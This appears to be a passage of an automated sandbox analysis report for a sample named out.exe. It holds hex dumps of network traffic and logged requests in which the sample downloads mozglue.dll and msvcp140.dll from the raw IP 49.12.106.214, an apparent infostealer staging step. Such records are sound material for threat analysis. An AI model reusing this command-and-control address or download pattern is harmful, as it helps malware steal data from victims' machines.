                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90
                                                                                                                                                                                        Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f
                                                                                                                                                                                        Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: e6 fc 03 00 00 33 8e 70 3b 08 10 8b 75 e0 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89
                                                                                                                                                                                        Data Ascii: 3p;u^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?Uu
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: c7 45 bc 00 00 00 00 8d 45 e0 50 e8 04 5a 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00
                                                                                                                                                                                        Data Ascii: EEPZ}EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: 44 24 70 50 e8 5b 1c 04 00 83 c4 04 8d 44 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7
                                                                                                                                                                                        Data Ascii: D$pP[D$`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: 89 f8 f7 65 c8 89 55 84 89 85 0c fd ff ff 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0
                                                                                                                                                                                        Data Ascii: eUeLXee0@eeeue0UEeeUeee $
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: 4f 34 89 4d e4 8b 4f 30 89 4d d4 8b 4f 2c 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8
                                                                                                                                                                                        Data Ascii: O4MO0MO,MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE
                                                                                                                                                                                        2024-10-07 18:35:36 UTC16384INData Raw: ee 1a 01 c2 89 95 08 ff ff ff 8b bd 2c ff ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5
                                                                                                                                                                                        Data Ascii: ,0<48%8A)$


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        12192.168.2.54987549.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:37 UTC197OUTGET /mozglue.dll HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:38 UTC260INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:38 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 608080
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Last-Modified: Monday, 07-Oct-2024 18:35:38 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-10-07 18:35:38 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                                                                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                                                                                                                                        2024-10-07 18:35:38 UTC16384INData Raw: 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46
                                                                                                                                                                                        Data Ascii: #H1A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPF
                                                                                                                                                                                        2024-10-07 18:35:38 UTC16384INData Raw: 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff
                                                                                                                                                                                        Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
                                                                                                                                                                                        2024-10-07 18:35:38 UTC16384INData Raw: c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85
                                                                                                                                                                                        Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}L
                                                                                                                                                                                        2024-10-07 18:35:38 UTC16384INData Raw: 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b
                                                                                                                                                                                        Data Ascii: EN1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
                                                                                                                                                                                        2024-10-07 18:35:38 UTC16384INData Raw: ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc
                                                                                                                                                                                        Data Ascii: H) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
                                                                                                                                                                                        2024-10-07 18:35:38 UTC16384INData Raw: 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9
                                                                                                                                                                                        Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4
                                                                                                                                                                                        2024-10-07 18:35:38 UTC16384INData Raw: 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89
                                                                                                                                                                                        Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$
                                                                                                                                                                                        2024-10-07 18:35:38 UTC16384INData Raw: fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83
                                                                                                                                                                                        Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
                                                                                                                                                                                        2024-10-07 18:35:38 UTC16384INData Raw: 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0
                                                                                                                                                                                        Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        13192.168.2.54988749.12.106.2144431396C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-07 18:35:39 UTC198OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                        Host: 49.12.106.214
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2024-10-07 18:35:39 UTC260INHTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Mon, 07 Oct 2024 18:35:39 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 450024
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Last-Modified: Monday, 07-Oct-2024 18:35:39 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-10-07 18:35:39 UTC16124INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
